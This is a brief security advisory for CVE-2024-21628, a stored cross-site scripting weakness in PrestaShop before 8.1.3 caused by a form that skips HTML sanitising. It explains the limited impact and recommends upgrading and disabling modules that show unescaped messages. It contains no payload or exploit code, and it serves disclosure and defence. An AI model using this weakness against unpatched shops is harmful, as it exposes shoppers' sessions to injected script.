CVE-2024-21628

Name of the Vulnerable Software and Affected Versions PrestaShop versions prior to 8.1.3

Description PrestaShop is an open-source e-commerce platform. The issue arises because the isCleanHtml method is not used on a specific form, allowing the storage of a cross-site scripting payload in the database. The impact is low due to twig's escape mechanism, which prevents HTML interpretation in the back office (BO). However, in the front office (FO), the cross-site scripting attack can be effective but only affects the customer who sent it or the customer session from which it was sent. This issue particularly affects those with a module that fetches and displays these messages from the database without escaping HTML.

Recommendations For PrestaShop versions prior to 8.1.3, update to version 8.1.3, which contains a patch for this issue. As a temporary workaround, consider disabling any modules that fetch and display messages from the database without proper HTML escaping until the patch can be applied. Restrict access to modules that may be vulnerable to this issue to minimize the risk of exploitation. Avoid using modules that display unescaped HTML content from the database in the front office until the issue is resolved.